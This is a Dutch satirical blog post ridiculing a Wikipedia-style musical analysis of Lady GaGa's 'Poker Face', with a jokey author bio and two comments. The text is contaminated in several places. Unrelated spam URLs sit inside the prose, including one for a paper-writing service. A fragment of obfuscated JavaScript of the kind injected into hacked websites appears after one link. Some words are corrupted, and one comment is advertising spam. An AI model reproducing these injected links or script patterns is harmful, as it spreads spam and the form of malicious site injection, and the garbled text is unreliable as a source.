Lady GaGa vlijmscherp geanalyseerd

Wee het gebeente van de onnozelaar die de muziek van Lady GaGa aanziet voor broddelwerk. Het betreft hier helemaal geen imitatie van de in de jaren negentig zo populaire Eurohouse. Als je maar goed genoeg je best doet, zie je zelfs een diepere laag in het oeuvre van de de vrolijk bepruikte Amerikaanse. Je moet het alleen welAi??wAi??llen zien. http://sveikisanariai.lt/?p=8919

RichV is zo’n man die muziek in al zijn vezels heeft zitten. En daarom is het ook niet meer dan logisch dat juist hij de Wikipediapagina van GaGa’s nummer 1 hit Poker Face heeft geschreven. Hij analyseerde voor u:

Jerney Kaagman inspireerde Lady GaGa tot het componeren van Poker Face.

Jerney Kaagman inspireerde Lady GaGa tot het componeren van 'Poker Face'.

“Waar de voorganger een volledige electropopnummer was, heeft Poker Face donkere coupletten en een refrein met duidelijke vocalen en een pophook, terwijl deze de synths van Just Dance en de beats van LoveGame combineert. Het verschil tussen de coupletten en het refrein is groot, waarbij de coupletten, zoals eerder vermeldt, duister zijn. Het refrein bevat uitbundige synths en er wordt ook in een hogere toonhoogte gezongen dan in de coupletten. Het nummer draait lyrisch om seksuele toespelingen en plagerijen.”

En nu zelf op zoek naar de pophook:

http://www.fulasidorna.com/2018/02/11/paper-writing-service/ 46d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Bekendheid kreeg hij met de presentatie van de AVRO's Wie-kent-kwis met de zogenaamde marmotten-race, waarbij het echter om cavia's ging. Hij werd verkozen tijdens het Conclaaf van april 2005 en is auteur van onder meer het boek: "Standing Firm: A Vice-Presidential Memoir".

2 Reacties op “Lady GaGa vlijmscherp geanalyseerd”

  1. Wat een heerlijke onzin.

  2. By us at the moment to grasp more knowledge and facts at all events Drop in on us now to obtain more knowledge and facts regarding Kabiny prysznicowe

Laat een bericht achter